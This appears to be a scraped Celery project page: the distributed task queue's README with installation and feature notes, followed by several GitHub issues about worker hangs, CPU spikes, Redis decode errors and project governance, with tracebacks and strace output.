Distributed Task Queue (development branch)

Overview

http://docs.celeryproject.org/en/latest/_images/celery-banner-small.png

Build status coverage BSD License Celery can be installed via wheel Supported Python versions. Supported Python implementations. Backers on Open Collective Sponsors on Open Collective

Version: 5.1.0b1 (singularity)
Web: https://docs.celeryproject.org/en/stable/index.html
Download: https://pypi.org/project/celery/
Source: https://github.com/celery/celery/
Keywords: task, queue, job, async, rabbitmq, amqp, redis, python, distributed, actors

Donations

This project relies on your generous donations.

If you are using Celery to create a commercial product, please consider becoming our backer or our sponsor to ensure Celery's future.

For enterprise

Available as part of the Tidelift Subscription.

The maintainers of celery and thousands of other packages are working with Tidelift to deliver commercial support and maintenance for the open source dependencies you use to build your applications. Save time, reduce risk, and improve code health, while paying the maintainers of the exact dependencies you use. Learn more.

What's a Task Queue?

Task queues are used as a mechanism to distribute work across threads or machines.

A task queue's input is a unit of work, called a task, dedicated worker processes then constantly monitor the queue for new work to perform.

Celery communicates via messages, usually using a broker to mediate between clients and workers. To initiate a task a client puts a message on the queue, the broker then delivers the message to a worker.

A Celery system can consist of multiple workers and brokers, giving way to high availability and horizontal scaling.

Celery is written in Python, but the protocol can be implemented in any language. In addition to Python there's node-celery for Node.js, a PHP client, gocelery for golang, and rusty-celery for Rust.

Language interoperability can also be achieved by using webhooks in such a way that the client enqueues an URL to be requested by a worker.

What do I need?

Celery version 5.1.0b1 runs on,

  • Python (3.6, 3.7, 3.8, 3.9)
  • PyPy3.6 (7.6)

This is the next version of celery which will support Python 3.6 or newer.

If you're running an older version of Python, you need to be running an older version of Celery:

  • Python 2.6: Celery series 3.1 or earlier.
  • Python 2.5: Celery series 3.0 or earlier.
  • Python 2.4: Celery series 2.2 or earlier.
  • Python 2.7: Celery 4.x series.

Celery is a project with minimal funding, so we don't support Microsoft Windows. Please don't open any issues related to that platform.

Celery is usually used with a message broker to send and receive messages. The RabbitMQ, Redis transports are feature complete, but there's also experimental support for a myriad of other solutions, including using SQLite for local development.

Celery can run on a single machine, on multiple machines, or even across datacenters.

Get Started

If this is the first time you're trying to use Celery, or you're new to Celery 5.0.5 or 5.1.0b1 coming from previous versions then you should read our getting started tutorials:

Celery is...

  • Simple

    Celery is easy to use and maintain, and does not need configuration files.

    It has an active, friendly community you can talk to for support, like at our mailing-list, or the IRC channel.

    Here's one of the simplest applications you can make:

    from celery import Celery
    
    app = Celery('hello', broker='amqp://[email protected]//')
    
    @app.task
    def hello():
        return 'hello world'
  • Highly Available

    Workers and clients will automatically retry in the event of connection loss or failure, and some brokers support HA in way of Primary/Primary or Primary/Replica replication.

  • Fast

    A single Celery process can process millions of tasks a minute, with sub-millisecond round-trip latency (using RabbitMQ, py-librabbitmq, and optimized settings).

  • Flexible

    Almost every part of Celery can be extended or used on its own, Custom pool implementations, serializers, compression schemes, logging, schedulers, consumers, producers, broker transports, and much more.

It supports...

  • Message Transports

  • Concurrency

  • Result Stores

    • AMQP, Redis
    • memcached
    • SQLAlchemy, Django ORM
    • Apache Cassandra, IronCache, Elasticsearch
  • Serialization

    • pickle, json, yaml, msgpack.
    • zlib, bzip2 compression.
    • Cryptographic message signing.

Framework Integration

Celery is easy to integrate with web frameworks, some of which even have integration packages:

Django not needed
Pyramid pyramid_celery
Pylons celery-pylons
Flask not needed
web2py web2py-celery
Tornado tornado-celery

The integration packages aren't strictly necessary, but they can make development easier, and sometimes they add important hooks like closing database connections at fork.

Documentation

The latest documentation is hosted at Read The Docs, containing user guides, tutorials, and an API reference.

最新的中文文档托管在 https://www.celerycn.io/ 中,包含用户指南、教程、API接口等。

Installation

You can install Celery either via the Python Package Index (PyPI) or from source.

To install using pip:

$ pip install -U Celery

Bundles

Celery also defines a group of bundles that can be used to install Celery and the dependencies for a given feature.

You can specify these in your requirements or on the pip command-line by using brackets. Multiple bundles can be specified by separating them by commas.

$ pip install "celery[librabbitmq]"

$ pip install "celery[librabbitmq,redis,auth,msgpack]"

The following bundles are available:

Serializers

celery[auth]: for using the auth security serializer.
celery[msgpack]: for using the msgpack serializer.
celery[yaml]: for using the yaml serializer.

Concurrency

celery[eventlet]: for using the eventlet pool.
celery[gevent]: for using the gevent pool.

Transports and Backends

celery[librabbitmq]:

for using the librabbitmq C library.

celery[redis]:

for using Redis as a message transport or as a result backend.

celery[sqs]:

for using Amazon SQS as a message transport.

celery[tblib]:

for using the task_remote_tracebacks feature.

celery[memcache]:

for using Memcached as a result backend (using pylibmc)

celery[pymemcache]:

for using Memcached as a result backend (pure-Python implementation).

celery[cassandra]:

for using Apache Cassandra as a result backend with DataStax driver.

celery[azureblockblob]:

for using Azure Storage as a result backend (using azure-storage)

celery[s3]:

for using S3 Storage as a result backend.

celery[couchbase]:

for using Couchbase as a result backend.

celery[arangodb]:

for using ArangoDB as a result backend.

celery[elasticsearch]:

for using Elasticsearch as a result backend.

celery[riak]:

for using Riak as a result backend.

celery[cosmosdbsql]:

for using Azure Cosmos DB as a result backend (using pydocumentdb)

celery[zookeeper]:

for using Zookeeper as a message transport.

celery[sqlalchemy]:

for using SQLAlchemy as a result backend (supported).

celery[pyro]:

for using the Pyro4 message transport (experimental).

celery[slmq]:

for using the SoftLayer Message Queue transport (experimental).

celery[consul]:

for using the Consul.io Key/Value store as a message transport or result backend (experimental).

celery[django]:

specifies the lowest version possible for Django support.

You should probably not use this in your requirements, it's here for informational purposes only.

Downloading and installing from source

Download the latest version of Celery from PyPI:

https://pypi.org/project/celery/

You can install it by doing the following,:

$ tar xvfz celery-0.0.0.tar.gz
$ cd celery-0.0.0
$ python setup.py build
# python setup.py install

The last command must be executed as a privileged user if you aren't currently using a virtualenv.

Using the development version

With pip

The Celery development version also requires the development versions of kombu, amqp, billiard, and vine.

You can install the latest snapshot of these using the following pip commands:

$ pip install https://github.com/celery/celery/zipball/master#egg=celery
$ pip install https://github.com/celery/billiard/zipball/master#egg=billiard
$ pip install https://github.com/celery/py-amqp/zipball/master#egg=amqp
$ pip install https://github.com/celery/kombu/zipball/master#egg=kombu
$ pip install https://github.com/celery/vine/zipball/master#egg=vine

With git

Please see the Contributing section.

Getting Help

Mailing list

For discussions about the usage, development, and future of Celery, please join the celery-users mailing list.

IRC

Come chat with us on IRC. The #celery channel is located at the Freenode network.

Bug tracker

If you have any suggestions, bug reports, or annoyances please report them to our issue tracker at https://github.com/celery/celery/issues/

Wiki

https://github.com/celery/celery/wiki

Credits

Contributors

This project exists thanks to all the people who contribute. Development of celery happens at GitHub: https://github.com/celery/celery

You're highly encouraged to participate in the development of celery. If you don't like GitHub (for some reason) you're welcome to send regular patches.

Be sure to also read the Contributing to Celery section in the documentation.

oc-contributors

Backers

Thank you to all our backers! 🙏 [Become a backer]

oc-backers

Sponsors

Support this project by becoming a sponsor. Your logo will show up here with a link to your website. [Become a sponsor]

oc-sponsors

License

This software is licensed under the New BSD License. See the LICENSE file in the top distribution directory for the full license text.

Comments
  • Release version 4.3 of Celery

    Release version 4.3 of Celery

    @thedrow @georgepsarakis It would be great if we can release the beta version of 4.3 by December 1st. before that, we need to release py-amqp. kombu and other dependencies first though. it's a soft reminder

    If you'd like to contribute, here is a list of blockers.

    If you are using Celery to create a commercial product, please consider becoming our backer or our sponsor to ensure Celery's future.

    Category: Project Governance 
    opened by auvipy 102
  • Release version 4.2.0

    Release version 4.2.0

    I think that it would be a good idea to release a new version that includes all bug fixes so far. @thedrow @auvipy thoughts?

    I can help with the changelog.

    Category: Project Governance 
    opened by georgepsarakis 84
  • Celery Worker 100% CPU usage - task revocation + SIGKILL

    Celery Worker 100% CPU usage - task revocation + SIGKILL

    Hello, I recognized that if I revoke tasks as well as kill the worker instances with the SIGKILL signal, on every machine a celery process consumes 100% CPU. The situation keeps and doesn't change after a while.

    Worker Hangs Component: Prefork Workers Pool Priority: Normal Severity: Normal 
    opened by nachtmaar 70
  • Celery worker using 100% CPU around epoll w/ prefork+redis and not consuming tasks

    Celery worker using 100% CPU around epoll w/ prefork+redis and not consuming tasks

    Hello,

    We're using Celery 3.1.6, and one of our queues is using 100% CPU for the master process. ps shows:

    root      6960 59.2  0.7 160680 51628 ?        Rs   Feb01 2319:49 /$VENV/bin/python /$VENV/manage.py celery worker -Q ads -P prefork --autoscale=10,5 -n $NAME --settings=settings -l INFO
    root     32727  0.3  1.1 266008 82860 ?        S    Feb02   6:29  \_ /$VENV/bin/python /$VENV/manage.py celery worker -Q ads -P prefork --autoscale=10,5 -n $NAME --settings=settings -l INFO
    root     32729  0.2  1.1 265184 82040 ?        S    Feb02   5:54  \_ /$VENV/bin/python /$VENV/manage.py celery worker -Q ads -P prefork --autoscale=10,5 -n $NAME --settings=settings -l INFO
    root     32730  0.2  1.4 282868 99788 ?        S    Feb02   5:29  \_ /$VENV/bin/python /$VENV/manage.py celery worker -Q ads -P prefork --autoscale=10,5 -n $NAME --settings=settings -l INFO
    root       750  0.1  1.5 296584 113100 ?       S    Feb02   3:03  \_ /$VENV/bin/python /$VENV/manage.py celery worker -Q ads -P prefork --autoscale=10,5 -n $NAME --settings=settings -l INFO
    root       917  0.2  1.1 262044 78888 ?        S    Feb02   6:00  \_ /$VENV/bin/python /$VENV/manage.py celery worker -Q ads -P prefork --autoscale=10,5 -n $NAME --settings=settings -l INFO
    root      1873  0.0  1.2 269460 86276 ?        S    Feb02   1:34  \_ /$VENV/bin/python /$VENV/manage.py celery worker -Q ads -P prefork --autoscale=10,5 -n $NAME --settings=settings -l INFO
    root      1875  0.0  1.4 285568 102384 ?       S    Feb02   0:36  \_ /$VENV/bin/python /$VENV/manage.py celery worker -Q ads -P prefork --autoscale=10,5 -n $NAME --settings=settings -l INFO
    root      2347  0.0  0.8 245448 60984 ?        S    Feb02   1:47  \_ /$VENV/bin/python /$VENV/manage.py celery worker -Q ads -P prefork --autoscale=10,5 -n $NAME --settings=settings -l INFO
    root      2348  0.0  0.8 247760 63356 ?        S    Feb02   1:33  \_ /$VENV/bin/python /$VENV/manage.py celery worker -Q ads -P prefork --autoscale=10,5 -n $NAME --settings=settings -l INFO
    root      2362  0.0  1.0 257880 73416 ?        S    Feb02   1:09  \_ /$VENV/bin/python /$VENV/manage.py celery worker -Q ads -P prefork --autoscale=10,5 -n $NAME --settings=settings -l INFO
    

    And strace is more interesting. It shows the following loop as the only thing happening in the parent:

    gettimeofday({1391450996, 406286}, NULL) = 0
    epoll_wait(4, {{EPOLLIN, {u32=6, u64=22205092589469702}}}, 1023, 1000) = 1
    epoll_ctl(4, EPOLL_CTL_DEL, 34, {EPOLLRDNORM|EPOLLRDBAND|EPOLLWRNORM|EPOLLMSG|0x4e9020, {u32=0, u64=22205092589469696}}) = -1 ENOENT (No such file or directory)
    epoll_ctl(4, EPOLL_CTL_DEL, 67, {EPOLLRDNORM|EPOLLRDBAND|EPOLLWRNORM|EPOLLMSG|0x4e9020, {u32=0, u64=22205092589469696}}) = -1 ENOENT (No such file or directory)
    epoll_ctl(4, EPOLL_CTL_DEL, 68, {EPOLLRDNORM|EPOLLRDBAND|EPOLLWRNORM|EPOLLMSG|0x4e9020, {u32=0, u64=22205092589469696}}) = -1 ENOENT (No such file or directory)
    epoll_ctl(4, EPOLL_CTL_DEL, 38, {EPOLLRDNORM|EPOLLRDBAND|EPOLLWRNORM|EPOLLMSG|0x4e9020, {u32=0, u64=22205092589469696}}) = -1 ENOENT (No such file or directory)
    epoll_ctl(4, EPOLL_CTL_DEL, 10, {EPOLLRDNORM|EPOLLRDBAND|EPOLLWRNORM|EPOLLMSG|0x4e9020, {u32=0, u64=22205092589469696}}) = -1 ENOENT (No such file or directory)
    epoll_ctl(4, EPOLL_CTL_DEL, 53, {EPOLLRDNORM|EPOLLRDBAND|EPOLLWRNORM|EPOLLMSG|0x4e9020, {u32=0, u64=22205092589469696}}) = -1 ENOENT (No such file or directory)
    epoll_ctl(4, EPOLL_CTL_DEL, 26, {EPOLLRDNORM|EPOLLRDBAND|EPOLLWRNORM|EPOLLMSG|0x4e9020, {u32=0, u64=22205092589469696}}) = -1 ENOENT (No such file or directory)
    epoll_ctl(4, EPOLL_CTL_DEL, 59, {EPOLLRDNORM|EPOLLRDBAND|EPOLLWRNORM|EPOLLMSG|0x4e9020, {u32=0, u64=22205092589469696}}) = -1 ENOENT (No such file or directory)
    epoll_ctl(4, EPOLL_CTL_DEL, 30, {EPOLLRDNORM|EPOLLRDBAND|EPOLLWRNORM|EPOLLMSG|0x4e9020, {u32=0, u64=22205092589469696}}) = -1 ENOENT (No such file or directory)
    epoll_ctl(4, EPOLL_CTL_DEL, 63, {EPOLLRDNORM|EPOLLRDBAND|EPOLLWRNORM|EPOLLMSG|0x4e9020, {u32=0, u64=22205092589469696}}) = -1 ENOENT (No such file or directory)
    epoll_ctl(4, EPOLL_CTL_ADD, 51, {EPOLLIN|EPOLLERR|EPOLLHUP, {u32=51, u64=22205092589469747}}) = -1 EEXIST (File exists)
    epoll_ctl(4, EPOLL_CTL_ADD, 52, {EPOLLIN|EPOLLERR|EPOLLHUP, {u32=52, u64=22205092589469748}}) = -1 EEXIST (File exists)
    epoll_ctl(4, EPOLL_CTL_ADD, 6, {EPOLLIN|EPOLLERR|EPOLLHUP, {u32=6, u64=22205092589469702}}) = -1 EEXIST (File exists)
    

    Those FDs are pipes according to /proc/$PID/fd. (strace also shows heartbeat/worker chatter from other processes read via the redis socket).

    Restarting the upstart job caused the worker to begin consuming tasks again. I think this is some corner case that isn't being handled well. Kombu's eventio.py has the following:

    class _epoll(Poller):
        # ...
        def register(self, fd, events):
            try:
                self._epoll.register(fd, events)
            except Exception as exc:
                if get_errno(exc) != errno.EEXIST:
                    raise
        def unregister(self, fd):
            try:
                self._epoll.unregister(fd)
            except (socket.error, ValueError, KeyError):
                pass
            except (IOError, OSError) as exc:
                if get_errno(exc) != errno.ENOENT:
                    raise
    

    We are specifically checking for ENOENT and EEXIST here and silently dropping the exception - it seems like this might be causing a problem for someone further down the stack, but I'm not familiar with this part of celery.

    Any help/pointers appreciated. Let me know what other info is useful as well.

    Component: Redis Broker Worker Hangs 
    opened by bpowers 68
  • Tasks are not allowed to start subprocesses

    Tasks are not allowed to start subprocesses

    Starting with Celery 3.1.0 the processes pool (celery.concurrency.prefork, former celery.concurrency.processes) uses daemon processes to perform tasks.

    Daemon processes are not allowed to create child processes and, as a result, tasks that use multiprocessing package are not working:

    [2013-11-29 14:27:48,297: ERROR/MainProcess] Task app.add[e5d184c0-471f-4fc4-804c-f760178d4847] raised exception: AssertionError('daemonic processes are not allowed to have children',)
    Traceback (most recent call last):
      File "/Users/aromanovich/Envs/celery3.1/lib/python2.7/site-packages/celery/app/trace.py", line 218, in trace_task
        R = retval = fun(*args, **kwargs)
      File "/Users/aromanovich/Envs/celery3.1/lib/python2.7/site-packages/celery/app/trace.py", line 398, in __protected_call__
        return self.run(*args, **kwargs)
      File "/Users/aromanovich/Projects/celery/app.py", line 10, in add
        manager = multiprocessing.Manager()
      File "/usr/local/Cellar/python/2.7.6/Frameworks/Python.framework/Versions/2.7/lib/python2.7/multiprocessing/__init__.py", line 99, in Manager
        m.start()
      File "/usr/local/Cellar/python/2.7.6/Frameworks/Python.framework/Versions/2.7/lib/python2.7/multiprocessing/managers.py", line 524, in start
        self._process.start()
      File "/usr/local/Cellar/python/2.7.6/Frameworks/Python.framework/Versions/2.7/lib/python2.7/multiprocessing/process.py", line 124, in start
        'daemonic processes are not allowed to have children'
    
    Status: Not a Bug 
    opened by aromanovich 68
  • AttributeError 'list' object has no attribute 'decode' with redis backend

    AttributeError 'list' object has no attribute 'decode' with redis backend

    Checklist

    • [X] I have included the output of celery -A proj report in the issue.
    software -> celery:4.1.0 (latentcall) kombu:4.1.0 py:3.5.2
                billiard:3.5.0.3 redis:2.10.5
    platform -> system:Linux arch:64bit, ELF imp:CPython
    loader   -> celery.loaders.app.AppLoader
    settings -> transport:redis results:redis://:**@****************
    
    task_ignore_result: True
    accept_content: {'pickle'}
    result_serializer: 'pickle'
    result_backend: 'redis://:********@************************'
    task_serializer: 'pickle'
    task_send_sent_event: True
    broker_url: 'redis://:********@************************'
    

    redis-server version, both 2.x and 3.x

    Steps to reproduce

    Hello, i'm not sure what can cause the problems and already tried to find a simillar solution, but no luck so far. Therefore opening issue here, hopefully it helps

    The issue is described there as well (not by me): https://github.com/andymccurdy/redis-py/issues/612

    So far the experience is, its happen in both cases, where backend is and isn't involved (means just when calling apply_async(...))

    Exception when calling apply_async() attributeerror___list__object_has_no_attribute__decode_

    Exception when calling .get() (also this one has int, instead of list) attributeerror___list__object_has_no_attribute__decode_

    Hope it helps

    Expected behavior

    To not throw the error.

    Actual behavior

    AttributeError: 'list' object has no attribute 'decode'

    Thanks!

    Issue Type: Bug Report Component: Redis Results Backend upstream bug 
    opened by Twista 60
  • Needs more maintainers

    Needs more maintainers

    Celery isn't advancing as fast as it should. We need more maintainers to merge and review pull requests, answer issues and push this awesome project forwards. Right now @ask acts as the only maintaner for this project and he's only one person that can contribute so many commits. What do you guys think about recruiting maintainers on a quarterly basis like Django REST Framework does?

    Category: Project Governance 
    opened by thedrow 60
  • Celery Worker crashing after first task with TypeError: 'NoneType' object is not callable

    Celery Worker crashing after first task with TypeError: 'NoneType' object is not callable

    Checklist

    • [X] I have included the output of celery -A proj report in the issue. (if you are not able to do this, then at least specify the Celery version affected).
    software -> celery:4.0.0 (latentcall) kombu:4.0.0 py:3.4.3
                billiard:3.5.0.2 py-amqp:2.1.1
    platform -> system:Linux arch:64bit, ELF imp:CPython
    loader   -> celery.loaders.default.Loader
    settings -> transport:amqp results:disabled
    
    • [X] I have verified that the issue exists against the master branch of Celery. Yes I've tested and it behaves the same using master.

    Steps to reproduce

    Not exactly sure, because other machines with the same specs and requirements are working.

    Expected behavior

    Should consume tasks.

    Actual behavior

    A task is accepted, then a traceback is logged, then the worker reconnects to the broker for some reason. This repeats forever:

    [2016-11-23 23:09:00,468: INFO/MainProcess] Connected to amqp://user:**@10.136.131.6:5672//
    [2016-11-23 23:09:00,484: INFO/MainProcess] mingle: searching for neighbors
    [2016-11-23 23:09:01,921: INFO/MainProcess] mingle: sync with 1 nodes
    [2016-11-23 23:09:01,922: INFO/MainProcess] mingle: sync complete
    [2016-11-23 23:09:01,970: INFO/MainProcess] Received task: tasks.calculate_user_running_total[ddd103af-d527-4564-83f8-96b747767a0c]
    [2016-11-23 23:09:01,972: CRITICAL/MainProcess] Unrecoverable error: TypeError("'NoneType' object is not callable",)
    Traceback (most recent call last):
      File "./venv/lib/python3.4/site-packages/celery/worker/worker.py", line 203, in start
        self.blueprint.start(self)
      File "./venv/lib/python3.4/site-packages/celery/bootsteps.py", line 119, in start
        step.start(parent)
      File "./venv/lib/python3.4/site-packages/celery/bootsteps.py", line 370, in start
        return self.obj.start()
      File "./venv/lib/python3.4/site-packages/celery/worker/consumer/consumer.py", line 318, in start
        blueprint.start(self)
      File "./venv/lib/python3.4/site-packages/celery/bootsteps.py", line 119, in start
        step.start(parent)
      File "./venv/lib/python3.4/site-packages/celery/worker/consumer/consumer.py", line 584, in start
        c.loop(*c.loop_args())
      File "./venv/lib/python3.4/site-packages/celery/worker/loops.py", line 47, in asynloop
        consumer.consume()
      File "./venv/lib/python3.4/site-packages/kombu/messaging.py", line 470, in consume
        self._basic_consume(T, no_ack=no_ack, nowait=False)
      File "./venv/lib/python3.4/site-packages/kombu/messaging.py", line 591, in _basic_consume
        no_ack=no_ack, nowait=nowait)
      File "./venv/lib/python3.4/site-packages/kombu/entity.py", line 737, in consume
        arguments=self.consumer_arguments)
      File "./venv/lib/python3.4/site-packages/amqp/channel.py", line 1578, in basic_consume
        wait=None if nowait else spec.Basic.ConsumeOk,
      File "./venv/lib/python3.4/site-packages/amqp/abstract_channel.py", line 73, in send_method
        return self.wait(wait, returns_tuple=returns_tuple)
      File "./venv/lib/python3.4/site-packages/amqp/abstract_channel.py", line 93, in wait
        self.connection.drain_events(timeout=timeout)
      File "./venv/lib/python3.4/site-packages/amqp/connection.py", line 464, in drain_events
        return self.blocking_read(timeout)
      File "./venv/lib/python3.4/site-packages/amqp/connection.py", line 469, in blocking_read
        return self.on_inbound_frame(frame)
      File "./venv/lib/python3.4/site-packages/amqp/method_framing.py", line 88, in on_frame
        callback(channel, msg.frame_method, msg.frame_args, msg)
      File "./venv/lib/python3.4/site-packages/amqp/connection.py", line 473, in on_inbound_method
        method_sig, payload, content,
      File "./venv/lib/python3.4/site-packages/amqp/abstract_channel.py", line 142, in dispatch_method
        listener(*args)
      File "./venv/lib/python3.4/site-packages/amqp/channel.py", line 1613, in _on_basic_deliver
        fun(msg)
      File "./venv/lib/python3.4/site-packages/kombu/messaging.py", line 617, in _receive_callback
        return on_m(message) if on_m else self.receive(decoded, message)
      File "./venv/lib/python3.4/site-packages/celery/worker/consumer/consumer.py", line 558, in on_task_received
        callbacks,
      File "./venv/lib/python3.4/site-packages/celery/worker/strategy.py", line 145, in task_message_handler
        handle(req)
      File "./venv/lib/python3.4/site-packages/celery/worker/worker.py", line 221, in _process_task_sem
        return self._quick_acquire(self._process_task, req)
      File "./venv/lib/python3.4/site-packages/kombu/async/semaphore.py", line 62, in acquire
        callback(*partial_args, **partial_kwargs)
      File "./venv/lib/python3.4/site-packages/celery/worker/worker.py", line 226, in _process_task
        req.execute_using_pool(self.pool)
      File "./venv/lib/python3.4/site-packages/celery/worker/request.py", line 532, in execute_using_pool
        correlation_id=task_id,
      File "./venv/lib/python3.4/site-packages/celery/concurrency/base.py", line 155, in apply_async
        **options)
      File "./venv/lib/python3.4/site-packages/billiard/pool.py", line 1487, in apply_async
        self._quick_put((TASK, (result._job, None, func, args, kwds)))
    TypeError: 'NoneType' object is not callable
    

    The above lines are keep repeating every few seconds and no tasks are consumed from the queue.

    opened by alanhamlett 54
  • Proposal to deprecate Redis as a broker support. [Rejected]

    Proposal to deprecate Redis as a broker support. [Rejected]

    If we removed support for Redis, we'd be able to focus the time on RabbitMQ, or maybe Kafka/nsq. There's also the huge task of porting to asyncio in Python 3.

    I think this should be seriously considered. If we are to work on this for fun, then the popularity of the transport shouldn't matter.

    In the end I will chose what I have the ability to work on anyway, but at least you can voice your concerns here.

    Category: Project Governance 
    opened by ask 54
  • Feature: Dynamic tasks

    Feature: Dynamic tasks

    So I submit to you dynamic tasks, and dynamic chords. This is a really powerful concept, and I think it changes the game.

    Subtasks returned by dynamic tasks are executed right after the first task executes. As if they were in a chain. You can also return chains and chords, and they will be properly inserted.

    This allows you to design a pipeline that can be completely dynamic, while benefiting from Celery's powerful idioms (subtasks, chains, chords...).

    Our whole backend at @veezio is powered by these. They allow use to have extensively dynamic pipelines. We have pipes inside chords, chords inside chords, tasks put before pipes etc....

    To be honest, I can't think of something you can't do with this.

    How to use:

    import celery.contrib.dynamic
    
    @celery.dynamic_task
    def test(number):
        if number > 5:
            return more.s()
        return less.()
    
    
    @celery.dynamic_task
    def more():
        print "it's more !"
    
    @celery.dynamic_task
    def less():
        print "it's less !"
    

    But you can do cool shit too!

    @celery.dynamic_task
    def one(n):
        if n:
            return three.si(n + 4) | four.s() # if you don't use an immutable task, the result of one (a subtask) will be sent to three.
        return n
    pipe = one.s(1) | two.s()
    
    pipe.apply_async() # will run: one(1) | three(1+4) | four | two
    

    You can also use them in chords! And have chords in chords!:

    from celery.contrib.dynamic import dynamic_chord as chord
    
    @celery.dynamic_task
    def resolve_url(url):
        # do some stuff, and paralellize all that
        return chord(map(do_stuff.si, data), on_finished.s())
    
    resolve_urls = chord(map(resolve_url.si, urls), url_resolved.s())
    

    In that case url_resolved will be called with the results from on_finished(), which is:

    [ [..., ], [..., ] ]
    
    opened by steeve 54
  • Worker hangs and stop responding after an undeterminated amount of time (sometimes).

    Worker hangs and stop responding after an undeterminated amount of time (sometimes).

    This is an ongoing investigation. What I'm putting here what I can see, so far.

    I have seen this problem since 4.0.2, and now I've just spot it in 4.1.0. These are the versions of the packages I'm using:

    kombu = 4.1.0
    celery = 4.1.0
    amqp = 2.2.1
    billiard = 3.5.0.3
    redis = 2.10.6
    

    The problem seems to happen when a worker with -c 1, and a worker_max_tasks_per_child=2000. This worker also processes tasks from a single queue 'odoo-8.0.cdr'. Just after the 2000th task it hangs. Strangely, the issue does not happen every time the worker reaches this threshold, but when it happens it happens at it.

    screenshot from 2017-10-10 12-02-08

    This is a production server so I can't really test with master branch. I'll try to reproduce on a development box later.

    stracing the Worker yields:

    root@mercurio:~# strace -p 9105
    Process 9105 attached
    recvfrom(27, 
    

    I waited for 5+ minutes and it didn't received anything. The file descriptors:

    [celeryd: 9105 mercurio   13u  sock       0,6      0t0 273693676 can't identify protocol
    [celeryd: 9105 mercurio   14u  sock       0,6      0t0 273693673 can't identify protocol
    [celeryd: 9105 mercurio   15u  0000       0,9        0      4047 [eventpoll]
    [celeryd: 9105 mercurio   16u  sock       0,6      0t0 273693679 can't identify protocol
    [celeryd: 9105 mercurio   17u  0000       0,9        0      4047 [eventpoll]
    [celeryd: 9105 mercurio   18u  0000       0,9        0      4047 [eventpoll]
    [celeryd: 9105 mercurio   19u  sock       0,6      0t0 273693682 can't identify protocol
    [celeryd: 9105 mercurio   20u  sock       0,6      0t0 273693685 can't identify protocol
    [celeryd: 9105 mercurio   21u  sock       0,6      0t0 273693942 can't identify protocol
    [celeryd: 9105 mercurio   22u  sock       0,6      0t0 273693945 can't identify protocol
    [celeryd: 9105 mercurio   23u  sock       0,6      0t0 273693948 can't identify protocol
    [celeryd: 9105 mercurio   24u  sock       0,6      0t0 273693951 can't identify protocol
    [celeryd: 9105 mercurio   25u  IPv4 288763673      0t0       TCP localhost.localdomain:56030->localhost.localdomain:6379 (ESTABLISHED)
    [celeryd: 9105 mercurio   26r  FIFO       0,8      0t0 288763672 pipe
    [celeryd: 9105 mercurio   27u  IPv4 288763676      0t0       TCP localhost.localdomain:56031->localhost.localdomain:6379 (ESTABLISHED)
    

    show that 27 is the redis connection, but there are several fds for which lsof can't indentify protocol. Half-closed connections?

    The ForkPoolWorker strace shows:

    r[email protected]:~# strace -p 23943
    Process 23943 attached
    read(7, 
    

    I also waited for 5+ minutes here to see if anything happen. Nothing. lsof shows:

    [celeryd: 23943 mercurio    6r   CHR    1,9      0t0     18535 /dev/urandom
    [celeryd: 23943 mercurio    7r  FIFO    0,8      0t0 273693670 pipe
    [celeryd: 23943 mercurio   10r   CHR    1,9      0t0     18535 /dev/urandom
    [celeryd: 23943 mercurio   11w  FIFO    0,8      0t0 273693671 pipe
    [celeryd: 23943 mercurio   12r   CHR    1,3      0t0     18531 /dev/null
    [celeryd: 23943 mercurio   15u  0000    0,9        0      4047 [eventpoll]
    [celeryd: 23943 mercurio   17u  0000    0,9        0      4047 [eventpoll]
    [celeryd: 23943 mercurio   26w  FIFO    0,8      0t0 288763672 pipe
    

    So 7 is a FIFO pipe (I don't know which).

    I'm sure that the queue gets a task every minute, since our application issues a new 'odoo-8.0.cdr' task per minute (like a clock). I can see the backlog:

    root@mercurio:~# redis-cli -n 9  llen 'odoo-8.0.cdr'
    (integer) 4586
    

    One minute later:

    root@mercurio:~# redis-cli -n 9  llen 'odoo-8.0.cdr'
    (integer) 4587
    

    To resume operation I have to restart the whole worker and this managed to process all the backlog (all tasks expire after 65s in the queue) and then, most of the time the worker keeps worker even beyond the 2000th task.

    Killing the child process shows that the worker does not even reap the child:

    [email protected]:~# ps ax | grep cdr
     9105 ?        S      2:32 [celeryd: [email protected]:MainProcess] -active- (celery worker -l INFO -n cdr-1@%h -c1 -Q odoo-8.0.cdr)
    23943 ?        Z      0:00 [[celeryd: cdr-1] <defunct>
    
    Worker Hangs Status: Needs Verification ✘ 
    opened by mvaled 50
  • AttributeError: int in uuid.py when being called by celery/concurrency/asynpool.py

    AttributeError: int in uuid.py when being called by celery/concurrency/asynpool.py

    Checklist

    • [ ] I have verified that the issue exists against the main branch of Celery.
    • [ ] This has already been asked to the discussions forum first.
    • [x] I have read the relevant section in the contribution guide on reporting bugs.
    • [x] I have checked the issues list for similar or identical bug reports.
    • [x] I have checked the pull requests list for existing proposed fixes.
    • [ ] I have checked the commit log to find out if the bug was already fixed in the main branch.
    • [x] I have included all related issues and possible duplicate issues in this issue (If there are none, check this box anyway).

    Mandatory Debugging Information

    • [x] I have included the output of celery -A proj report in the issue. (if you are not able to do this, then at least specify the Celery version affected).
    • [ ] I have verified that the issue exists against the main branch of Celery.
    • [x] I have included the contents of pip freeze in the issue.
    • [ ] I have included all the versions of all the external dependencies required to reproduce this bug.

    Optional Debugging Information

    • [x] I have tried reproducing the issue on more than one Python version and/or implementation.
    • [ ] I have tried reproducing the issue on more than one message broker and/or result backend.
    • [x] I have tried reproducing the issue on more than one version of the message broker and/or result backend.
    • [ ] I have tried reproducing the issue on more than one operating system.
    • [ ] I have tried reproducing the issue on more than one workers pool.
    • [ ] I have tried reproducing the issue with autoscaling, retries, ETA/Countdown & rate limits disabled.
    • [x] I have tried reproducing the issue after downgrading and/or upgrading Celery and its dependencies.

    Related Issues and Possible Duplicates

    Related Issues

    • None

    Possible Duplicates

    • None

    Environment & Settings

    Celery version:

    celery report Output:

    <unknown>:1: DeprecationWarning: invalid escape sequence \.
    <unknown>:1: DeprecationWarning: invalid escape sequence \:
    <unknown>:1: DeprecationWarning: invalid escape sequence \.
    <unknown>:1: DeprecationWarning: invalid escape sequence \:
    /usr/local/lib/python3.9/dist-packages/celery/utils/collections.py:163: RemovedInDjango40Warning: The PASSWORD_RESET_TIMEOUT_DAYS setting is deprecated. Use PASSWORD_RESET_TIMEOUT instead.
      return getattr(self.obj, key)
    
    software -> celery:5.2.7 (dawn-chorus) kombu:5.2.4 py:3.9.2
                billiard:3.6.4.0 py-amqp:5.1.1
    platform -> system:Linux arch:64bit
                kernel version:5.10.16.3-microsoft-standard-WSL2 imp:CPython
